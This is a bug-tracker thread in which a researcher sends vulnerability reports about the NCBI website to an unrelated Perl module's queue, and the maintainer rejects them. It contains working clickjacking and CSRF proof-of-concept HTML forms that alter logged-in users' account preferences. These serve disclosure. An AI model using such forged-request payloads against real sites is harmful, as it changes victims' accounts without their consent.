Bug #122870 for NCBI: Vulnerable to click jacking

Tue Aug 22 13:06:26 2017 husnainiqbal02 [...] gmail.com - Ticket created

Subject:	Vulnerable to click jacking
Date:	Tue, 22 Aug 2017 22:06:13 +0500
To:	bug-NCBI [...] rt.cpan.org
From:	Husnain Iqbal <husnainiqbal02 [...] gmail.com>

Hello Ncbi, Iam husnain iqbal,a security researcher.while i was going through your website i found your website is vulnerable to clickjacking.. heres some description about click jacking.. Typically there is one type of attack - cross site request forgeries (CSRF) that can interact with functions on other websites. Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server didn't return an X-Frame-Options header which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. This vulnerability affects Web Server. POC Here are the steps to reproduce the vulnerability 1.open notepad and paste the folloing code <html> <head> <title>Clickjack test page</title> </head> <body> <p>Website is vulnerable to clickjacking!</p> <iframe src="https://www.ncbi.nlm.nih.gov/account/settings/" width="1247" height="800"></iframe> </body> </html 2.save it as <anyname>.html eg s.html 3.and just simply open that.. As far as i know this data is enough to prove that your site is vulberable to Clickjacking.. according to OWASP its more than enough.. https://www.owasp.org/index.php/Testing_for_Clickjacking_(OWASP-CS-004) SOLUTION: https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet check this out..here is the solution for that... Thanks Looking after your response Regards: Husnain

Download Untitled.png
image/png 110.1k

Message body is not shown because sender requested not to inline it.

Tue Aug 22 13:11:42 2017 ether [...] cpan.org - Ticket deleted

Tue Aug 22 13:43:08 2017 husnainiqbal02 [...] gmail.com - Ticket #122871: Ticket created

Subject:	NO CSRF PROTECTION ON PREFERENCES
Date:	Tue, 22 Aug 2017 22:43:00 +0500
To:	bug-NCBI [...] rt.cpan.org
From:	Husnain Iqbal <husnainiqbal02 [...] gmail.com>

Hi Team i am security researcher and i found your website vulnerable to this vulnerability Bug type : no CSRF Vulnerable site : https://www.ncbi.nlm.nih.gov/myncbi/preferences/ Description : I found that i can force any one to change the account preferences like common preferences,pubmed preferences,PMC preferences etc just because the lack of csrf There is no CSRF protection so i can force any user from your site. Here i am sending you some csrf poc for pubmed preferences Csrf Poc for Abstract supplement Data: <html> <body> <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST"> <input type="hidden" name="p$site" value="myncbi" /> <input type="hidden" name="p$rq" value="PAFAppLayout.AppController.Page.myncbiApp_Preferences.myncbiAppPage_Preferences:saveSh owAuthorAffiliation_XHR" /> <input type="hidden" name="showAffiliation" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html> Csrf poc For Doument Delivery preference: <html> <body> <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST"> <input type="hidden" name="p$site" value="myncbi" /> <input type="hidden" name="p$rq" value="PAFAppLayout.AppController.Page.myncbiApp_Preferences.myncbiAppPage_Preferences:saveDo cumentDelivery_XHR" /> <input type="hidden" name="docDel" value="infoexpress" /> <input type="submit" value="Submit request" /> </form> </body> </html> Csrf Poc For Author information preference: <html> <body> <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" method="POST"> <input type="hidden" name="p$site" value="myncbi" /> <input type="hidden" name="p$rq" value="PAFAppLayout.AppController.Page.myncbiApp_Preferences.myncbiAppPage_Preferences:saveAbstractSupplemental_XHR" /> <input type="hidden" name="suppInfoDisp" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html> Thanks. I hope you'll triage this. Waiting for your response. Regards: Husnain Iqbal

Tue Aug 22 13:45:44 2017 ether [...] cpan.org - Ticket #122871: Ticket deleted

Wed Aug 23 09:02:32 2017 husnainiqbal02 [...] gmail.com - Ticket #122880: Ticket created

Subject:	Re: NO CSRF PROTECTION ON PREFERENCES
Date:	Wed, 23 Aug 2017 18:02:13 +0500
To:	bug-NCBI [...] rt.cpan.org
From:	Husnain Iqbal <husnainiqbal02 [...] gmail.com>

Any updates? On 22 August 2017 at 22:43, Husnain Iqbal <husnainiqbal02@gmail.com> wrote: Show quoted text

> Hi Team i am security researcher and i found your website vulnerable to > this vulnerability > > Bug type : no CSRF > Vulnerable site : https://www.ncbi.nlm.nih.gov/myncbi/preferences/ > Description : > > I found that i can force any one to change the account preferences like > common preferences,pubmed preferences,PMC preferences etc just because the > lack of csrf > There is no CSRF protection so i can force any user from your site. > > Here i am sending you some csrf poc for pubmed preferences > > Csrf Poc for Abstract supplement Data: > > <html> > > <body> > <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" > method="POST"> > <input type="hidden" name="p$site" value="myncbi" /> > <input type="hidden" name="p$rq" > > value="PAFAppLayout.AppController.Page. > myncbiApp_Preferences.myncbiAppPage_Preferences:saveSh > > owAuthorAffiliation_XHR" /> > <input type="hidden" name="showAffiliation" value="true" /> > <input type="submit" value="Submit request" /> > </form> > </body> > </html> > > Csrf poc For Doument Delivery preference: > > <html> > > <body> > <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" > method="POST"> > <input type="hidden" name="p$site" value="myncbi" /> > <input type="hidden" name="p$rq" > > value="PAFAppLayout.AppController.Page. > myncbiApp_Preferences.myncbiAppPage_Preferences:saveDo > > cumentDelivery_XHR" /> > <input type="hidden" name="docDel" value="infoexpress" /> > <input type="submit" value="Submit request" /> > </form> > </body> > </html> > > Csrf Poc For Author information preference: > > <html> > > <body> > <form action="https://www.ncbi.nlm.nih.gov/myncbi/preferences/" > method="POST"> > <input type="hidden" name="p$site" value="myncbi" /> > <input type="hidden" name="p$rq" value="PAFAppLayout. > AppController.Page.myncbiApp_Preferences. > myncbiAppPage_Preferences:saveAbstractSupplemental_XHR" /> > <input type="hidden" name="suppInfoDisp" value="true" /> > <input type="submit" value="Submit request" /> > </form> > </body> > </html> > > Thanks. > I hope you'll triage this. Waiting for your response. > Regards: > Husnain Iqbal >

Wed Aug 23 12:39:51 2017 ether [...] cpan.org - Ticket #122880: Ticket deleted

Wed Aug 23 12:40:18 2017 ether [...] cpan.org - Ticket #122880: Status changed from 'deleted' to 'open'

Wed Aug 23 12:40:43 2017 ether [...] cpan.org - Status changed from 'deleted' to 'open'

Wed Aug 23 12:40:59 2017 ether [...] cpan.org - Ticket #122880: Merged into ticket #122870

Wed Aug 23 12:40:59 2017 ether [...] cpan.org - Merged into ticket #122870

Wed Aug 23 12:41:36 2017 ether [...] cpan.org - Ticket #122871: Merged into ticket #122870

Wed Aug 23 12:41:36 2017 ether [...] cpan.org - Merged into ticket #122870

Wed Aug 23 12:43:51 2017 ether [...] cpan.org - Correspondence added

You sent emails to the bug queue for a Perl language interface to the NCBI site. It has no affiliation with the organization; please address your concerns directly to https://www.ncbi.nlm.nih.gov.

Wed Aug 23 12:43:52 2017 ether [...] cpan.org - Status changed from 'open' to 'rejected'